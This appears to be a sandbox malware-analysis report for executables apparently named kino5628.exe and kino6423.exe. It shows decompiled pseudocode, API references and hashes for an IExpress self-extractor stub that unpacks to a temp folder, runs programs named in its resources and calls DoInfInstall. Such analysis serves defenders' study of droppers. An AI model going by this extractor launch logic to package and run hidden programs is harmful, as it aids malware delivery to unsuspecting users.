C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E63EB

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-1116576409
Opcode ID: 01fc14845eb87c054ccf36dbf59d3cf2cd010c223a60c4b55fb11cf84defc220
Instruction ID: 28cc8ba5702ac786e27acfb3ab7812c4e4145ad8889b882f3776d0169f10802c
Opcode Fuzzy Hash: 01fc14845eb87c054ccf36dbf59d3cf2cd010c223a60c4b55fb11cf84defc220
Instruction Fuzzy Hash: 08210571A0025CABCB10DF26DCC5FEB7368FB56354F000169F595E7280EAB46D948F64

Uniqueness

Uniqueness Score: -1.00%

Function 008E47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E008E1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x8e91e0; // 0x2af7a60
						 *(_t34 + 4) = _t11;
						 *0x8e91e0 = _t34;
						return 1;
					}
					_t25 =  *0x8e8584; // 0x0
					E008E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x8e8584; // 0x0
				E008E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x008e47e8
0x008e47f0
0x008e47f4
0x008e480f
0x008e4811
0x008e4814
0x008e4814
0x008e4816
0x008e4817
0x008e4829
0x008e482b
0x008e482f
0x008e484f
0x008e4852
0x008e4855
0x008e4855
0x008e4857
0x008e4858
0x008e4860
0x008e4865
0x008e486a
0x008e486f
0x00000000
0x008e4876
0x008e4831
0x008e4841
0x008e4847
0x008e480b
0x00000000
0x008e480b
0x008e47f6
0x008e4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,008E4E6F), ref: 008E47EA
LocalAlloc.KERNEL32(00000040,?), ref: 008E4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 008E4847

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E4851

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-1116576409
Opcode ID: 3f8ef36127c7c88c83a94f11d28f1a69d733bc24de4bfa097a17f2924dc8f41d
Instruction ID: 4db25ba1b2b585473ddd31c1e688dcd44e995c58f07de82f4d43ea24bffe93a8
Opcode Fuzzy Hash: 3f8ef36127c7c88c83a94f11d28f1a69d733bc24de4bfa097a17f2924dc8f41d
Instruction Fuzzy Hash: 3D1129B52046C1AFE7188F299C58F773B5AFB86700F04952DF98ACB341DA359C068760

Uniqueness

Uniqueness Score: -1.00%

Function 008E3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x008e368c
0x008e368f
0x008e3691
0x008e369f
0x008e36a7
0x00000000
0x00000000
0x008e36ba
0x00000000
0x008e36bc
0x008e36bc
0x008e36c0
0x008e36cb
0x008e36c2
0x008e36c4
0x008e36c4
0x008e36da
0x008e36e0
0x008e36e6
0x00000000
0x00000000
0x008e36e6
0x00000000
0x008e36ba
0x008e36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008E369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008E36B2
DispatchMessageA.USER32(?), ref: 008E36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008E36DA

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: fb9b6294fc29ec4640d67f7a4270a0ab6ab3f384ec11c1ffe1d32cf0879d5b2b
Instruction ID: f346b007f240fd45b1f2d96957df8c176a0c1c98c199a413fbe1b8ed05c63e20
Opcode Fuzzy Hash: fb9b6294fc29ec4640d67f7a4270a0ab6ab3f384ec11c1ffe1d32cf0879d5b2b
Instruction Fuzzy Hash: 88018F72A04298BBDB304AA79C4CEEB7B7CFB96F10F000129B905E7290D6619A40D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 008E6517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E008E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x8e9a3c; // 0x8e0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E008E44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x008e651f
0x008e652a
0x008e6534
0x008e656b
0x008e6577
0x008e657c
0x008e6536
0x008e653e
0x008e6542
0x00000000
0x008e6544
0x008e6547
0x008e654c
0x008e6549
0x008e6549
0x008e6549
0x008e655e
0x008e6560
0x008e6569
0x00000000
0x00000000
0x008e6569
0x008e6542
0x008e6587

APIs

FindResourceA.KERNEL32(008E0000,000007D6,00000005), ref: 008E652A
LoadResource.KERNEL32(008E0000,00000000,?,?,008E2EE8,00000000,008E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008E6538
DialogBoxIndirectParamA.USER32(008E0000,00000000,00000547,008E19E0,00000000), ref: 008E6557
FreeResource.KERNEL32(00000000,?,?,008E2EE8,00000000,008E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008E6560

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 6da5f08cb477332ad3cd7a3a24d68f438210c4aea03e8cd815394f28bee3a24d
Instruction ID: 085ae86e09e9f8d434b9c22fa482bcd9155657689742e9097f54631104c75a36
Opcode Fuzzy Hash: 6da5f08cb477332ad3cd7a3a24d68f438210c4aea03e8cd815394f28bee3a24d
Instruction Fuzzy Hash: 4C012B72200595BBCB105F5A9C48DBB766CFF967A1F010125FE15D7150E771DD2086A1

Uniqueness

Uniqueness Score: -1.00%

Function 008E65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E008E65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x008e65e8
0x008e65ed
0x008e65ef
0x008e65f2
0x008e65f4
0x008e65f4
0x008e65f6
0x008e65f7
0x008e6608
0x008e6611
0x008e6618
0x008e661c
0x00000000
0x00000000
0x008e660e
0x008e6623
0x008e6625
0x008e663b
0x008e663b
0x008e663d
0x008e6641
0x008e6610
0x008e6610
0x00000000
0x008e6610
0x008e6644
0x008e6647
0x008e6647
0x008e6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,008E2B33), ref: 008E6602
CharPrevA.USER32(?,00000000), ref: 008E6612
CharPrevA.USER32(?,00000000), ref: 008E6629
CharNextA.USER32(00000000), ref: 008E6635

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: be4d48cb11230af05b3ab0addf00ff9bb9045f32e08b43534ca6b9d6e4292697
Instruction ID: 9f6a95201fcc9b66de362d16a93dae81293bd2e281ba7ebf0622ccb15eb74831
Opcode Fuzzy Hash: be4d48cb11230af05b3ab0addf00ff9bb9045f32e08b43534ca6b9d6e4292697
Instruction Fuzzy Hash: 51F028320041D06EE7361B2A8CC88BBBF9CFFB7794B2941AFE496C6021F7150D068661

Uniqueness

Uniqueness Score: -1.00%

Function 008E69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x8e81f8 = E008E6C70();
				__set_app_type(E008E6FBE(2));
				 *0x8e88a4 =  *0x8e88a4 | 0xffffffff;
				 *0x8e88a8 =  *0x8e88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x8e8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x8e851c; // 0x0
				 *_t5 = _t12;
				_t6 = E008E7000();
				if( *0x8e8000 == 0) {
					__setusermatherr(E008E7000);
				}
				E008E71EF(_t6);
				return 0;
			}

0x008e69b7
0x008e69c2
0x008e69c8
0x008e69cf
0x008e69d8
0x008e69de
0x008e69e4
0x008e69e6
0x008e69ec
0x008e69f2
0x008e69f4
0x008e6a00
0x008e6a07
0x008e6a0d
0x008e6a0e
0x008e6a15

APIs

Part of subcall function 008E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 008E6FC5

__set_app_type.MSVCRT ref: 008E69C2
__p__fmode.MSVCRT ref: 008E69D8
__p__commode.MSVCRT ref: 008E69E6
__setusermatherr.MSVCRT ref: 008E6A07

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: e0c58721de1d2abfa8b3dc6187ac6f7520691f09181e8f0d7d64f6766aae1dbb
Instruction ID: 87d672eea63e37a27de0e089ff3c4db18989c3dc9e4406dc98f48913d0a11820
Opcode Fuzzy Hash: e0c58721de1d2abfa8b3dc6187ac6f7520691f09181e8f0d7d64f6766aae1dbb
Instruction Fuzzy Hash: FBF01C705087C1CFC758AB35FD8A6083B62FB06731B100A19E865EE2F0DF3A9550CA12

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kino6423.exePID: 6028, Parent PID: 6084COMMON

Execution Graph

Execution Coverage:	28.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	963
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E53BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00E53BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xe58004; // 0x5ba1a886
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xe59124 =  *0xe59124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xe58a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xe58c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00E5468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00E544B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xe59124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00E51AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00E56CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00E53FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xe58580;
													if( *0xe58580 != 0) {
														E00E52267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xe58180;
											if( *0xe58180 == 0) {
												_t146 = 0x4c7;
												E00E544B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xe59124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xe59a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00E56495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00E544B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xe59124 = E00E56285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00E544B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xe58a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xe59a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xe58a38 & 0x0000ffff;
											_v380 = 0xe59154;
											_v376 = _t151;
											_v372 = 0xe591e4;
											_v360 = _t97;
											if( *0xe58a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xe59a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xe58d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xe59a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xe5a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xe59124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xe59a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xe58a20;
										if( *0xe58a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00E5202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00E5468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xe58c42;
									if( *0xe58c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xe58a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00E5468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00E5468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00E51781( &_v276, 0x104, _t130, 0xe58c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00E5468F(_t130, 0xe59a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00e53baa
0x00e53bb0
0x00e53bb7
0x00e53bc0
0x00e53bc2
0x00e53bc9
0x00e53bcb
0x00e53bcf
0x00e53bd3
0x00e53bd9
0x00e53bfd
0x00e53bfd
0x00e53bff
0x00e53c03
0x00e53c03
0x00e53c11
0x00e53c16
0x00e53c19
0x00e53c28
0x00000000
0x00000000
0x00e53c30
0x00e53c39
0x00e53c40
0x00e53d13
0x00e53d15
0x00e53d21
0x00e53d26
0x00000000
0x00e53c4f
0x00e53c56
0x00e53c60
0x00e53c65
0x00e53c77
0x00e53c78
0x00e53c7c
0x00e53c7e
0x00e53c82
0x00e53c82
0x00000000
0x00e53c7c
0x00e53c67
0x00e53c69
0x00e53c6d
0x00000000
0x00e53c58
0x00e53c58
0x00e53c6e
0x00e53c6e
0x00e53c87
0x00e53c89
0x00e53d4d
0x00e53d4f
0x00e53d50
0x00e53d52
0x00e53d9e
0x00e53da8
0x00e53daf
0x00e53db4
0x00e53db6
0x00e53f4d
0x00e53f4d
0x00e53f4f
0x00e53f56
0x00e53f57
0x00e53f58
0x00e53f63
0x00e53f63
0x00e53dbc
0x00e53dc0
0x00e53dc2
0x00e53de6
0x00e53de6
0x00e53de8
0x00e53f0b
0x00e53f0b
0x00e53f0f
0x00e53f13
0x00e53f15
0x00e53f1a
0x00e53f1c
0x00e53f46
0x00e53f47
0x00000000
0x00e53f47
0x00e53f1e
0x00e53f1f
0x00e53f25
0x00e53f26
0x00e53f2a
0x00e53f2d
0x00e53fd9
0x00e53fd9
0x00e53fda
0x00e53fda
0x00e53fe1
0x00e53fe3
0x00e53fe3
0x00e53fe8
0x00000000
0x00e53fe8
0x00e53f33
0x00e53f37
0x00000000
0x00e53f37
0x00e53dee
0x00e53dee
0x00e53df5
0x00e53fad
0x00e53fb9
0x00e53fc2
0x00e53fc8
0x00000000
0x00e53fc8
0x00e53dfb
0x00e53dfd
0x00000000
0x00000000
0x00e53e03
0x00e53e0a
0x00000000
0x00000000
0x00e53e15
0x00e53e17
0x00e53e19
0x00e53f94
0x00e53fa4
0x00e53f7c
0x00e53f80
0x00e53f8b
0x00000000
0x00e53f8b
0x00e53e2c
0x00e53e30
0x00e53e34
0x00e53e36
0x00e53f69
0x00e53f6e
0x00e53f70
0x00e53f76
0x00000000
0x00e53f76
0x00e53e3c
0x00e53e43
0x00e53e47
0x00e53e52
0x00e53e56
0x00e53e5c
0x00e53e61
0x00e53e68
0x00e53e70
0x00e53e74
0x00e53e7c
0x00e53e80
0x00e53e82
0x00e53e82
0x00e53e87
0x00e53e87
0x00e53e8b
0x00e53e91
0x00e53e94
0x00e53e96
0x00e53e96
0x00e53e9b
0x00e53e9b
0x00e53e9f
0x00e53ea2
0x00e53ea4
0x00e53ea4
0x00e53ea9
0x00e53ea9
0x00e53ead
0x00e53eb3
0x00e53eb6
0x00e53eb8
0x00e53eb8
0x00e53ebd
0x00e53ebd
0x00e53ec1
0x00e53ec3
0x00e53ec5
0x00e53ec5
0x00e53eca
0x00e53eca
0x00e53ece
0x00e53ed5
0x00e53ed9
0x00e53ee0
0x00e53ee6
0x00e53eea
0x00e53eec
0x00e53eee
0x00e53ef3
0x00e53ef3
0x00e53ef5
0x00e53efa
0x00e53efb
0x00e53efd
0x00e53f40
0x00000000
0x00e53eff
0x00e53eff
0x00e53f05
0x00000000
0x00e53f05
0x00e53efd
0x00e53dc7
0x00e53dce
0x00000000
0x00000000
0x00e53dd0
0x00e53dd7
0x00000000
0x00000000
0x00e53dd9
0x00e53ddb
0x00000000
0x00000000
0x00e53ddd
0x00e53de1
0x00000000
0x00e53de1
0x00e53d59
0x00e53d65
0x00e53d6a
0x00e53d6c
0x00000000
0x00000000
0x00e53d6e
0x00e53d75
0x00000000
0x00000000
0x00e53d8f
0x00e53d96
0x00e53d98
0x00000000
0x00000000
0x00000000
0x00e53d98
0x00e53c8f
0x00e53c98
0x00e53cf1
0x00e53cf3
0x00000000
0x00000000
0x00e53cfe
0x00e53d11
0x00000000
0x00000000
0x00000000
0x00e53d11
0x00e53c9c
0x00e53ca5
0x00e53ca7
0x00000000
0x00000000
0x00e53cad
0x00e53cb2
0x00e53cb7
0x00e53cc5
0x00000000
0x00000000
0x00e53ce8
0x00e53cec
0x00e53ced
0x00e53ced
0x00000000
0x00e53ce8
0x00e53c9e
0x00000000
0x00e53c9e
0x00e53c56
0x00e53d35
0x00e53d35
0x00e53d3c
0x00e53d48
0x00000000
0x00e53d48
0x00e53c03
0x00e53be2
0x00e53be7
0x00e53bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00E53C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00E53CDC

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
